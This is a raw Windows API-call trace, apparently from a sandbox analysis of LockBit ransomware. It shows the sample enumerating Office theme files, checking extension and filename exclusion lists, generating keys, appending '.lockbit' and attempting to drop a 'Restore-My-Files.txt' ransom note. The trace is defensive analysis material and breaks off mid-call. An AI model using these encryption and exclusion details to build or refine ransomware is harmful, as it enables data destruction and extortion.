[0195.776] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.777] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.777] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.777] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.777] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml.lockbit") returned 82 [0195.777] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\grid.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.780] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.780] malloc (_Size=0x40068) returned 0x3df0008 [0195.780] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3673) returned 1 [0195.780] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.781] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.781] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.781] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.782] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.787] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.787] malloc (_Size=0xba) returned 0x1fa2ed8 [0195.787] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xba, FileInformationClass=0xa) returned 0xc0000008 [0195.787] free (_Block=0x1fa2ed8) [0195.787] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.787] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.787] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.787] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d67200, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d67200, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xf09, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hardcover.xml", cAlternateFileName="HARDCO~1.XML")) returned 1 [0195.787] lstrcmpiW (lpString1=".", lpString2="Hardcover.xml") returned -1 [0195.787] lstrcmpiW (lpString1="..", lpString2="Hardcover.xml") returned -1 [0195.787] PathFindExtensionW (pszPath="Hardcover.xml") returned=".xml" [0195.787] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.787] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.787] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.787] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.787] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.787] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.787] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.787] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.788] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Hardcover.xml") returned 1 [0195.789] lstrcmpiW (lpString1="ntldr", lpString2="Hardcover.xml") returned 1 [0195.789] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Hardcover.xml") returned 1 [0195.789] lstrcmpiW (lpString1="bootsect.bak", lpString2="Hardcover.xml") returned -1 [0195.789] lstrcmpiW (lpString1="autorun.inf", lpString2="Hardcover.xml") returned -1 [0195.789] lstrcmpiW (lpString1="thumbs.db", lpString2="Hardcover.xml") returned 1 [0195.789] lstrcmpiW (lpString1="iconcache.db", lpString2="Hardcover.xml") returned 1 [0195.789] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.789] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml") returned=".xml" [0195.789] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.789] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.789] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.790] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.790] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml.lockbit") returned 87 [0195.790] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\hardcover.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.792] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.792] malloc (_Size=0x40068) returned 0x3df0008 [0195.792] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3849) returned 1 [0195.792] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.793] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.793] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.793] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.793] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.798] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.798] malloc (_Size=0xc4) returned 0x1fa2ed8 [0195.798] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0195.798] free (_Block=0x1fa2ed8) [0195.798] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.799] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.799] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.799] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1786e800, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1786e800, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Horizon.xml", cAlternateFileName="")) returned 1 [0195.799] lstrcmpiW (lpString1=".", lpString2="Horizon.xml") returned -1 [0195.799] lstrcmpiW (lpString1="..", lpString2="Horizon.xml") returned -1 [0195.799] PathFindExtensionW (pszPath="Horizon.xml") returned=".xml" [0195.799] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.799] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.800] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Horizon.xml") returned 1 [0195.801] lstrcmpiW (lpString1="ntldr", lpString2="Horizon.xml") returned 1 [0195.801] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Horizon.xml") returned 1 [0195.801] lstrcmpiW (lpString1="bootsect.bak", lpString2="Horizon.xml") returned -1 [0195.801] lstrcmpiW (lpString1="autorun.inf", lpString2="Horizon.xml") returned -1 [0195.801] lstrcmpiW (lpString1="thumbs.db", lpString2="Horizon.xml") returned 1 [0195.801] lstrcmpiW (lpString1="iconcache.db", lpString2="Horizon.xml") returned 1 [0195.801] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.801] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml") returned=".xml" [0195.801] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.801] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.801] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.802] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.802] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.802] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.802] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.802] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.802] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.802] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.802] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.802] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.802] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.802] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.802] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.802] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml.lockbit") returned 85 [0195.802] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\horizon.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.804] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.804] malloc (_Size=0x40068) returned 0x3df0008 [0195.804] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3626) returned 1 [0195.804] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.805] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.805] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.805] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.805] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.811] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.811] malloc (_Size=0xc0) returned 0x1fa2ed8 [0195.811] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0xc0000008 [0195.811] free (_Block=0x1fa2ed8) [0195.811] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.811] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.811] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.811] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3c3a200, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3c3a200, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xeed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Median.xml", cAlternateFileName="")) returned 1 [0195.811] lstrcmpiW (lpString1=".", lpString2="Median.xml") returned -1 [0195.811] lstrcmpiW (lpString1="..", lpString2="Median.xml") returned -1 [0195.811] PathFindExtensionW (pszPath="Median.xml") returned=".xml" [0195.812] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.812] lstrcmpiW 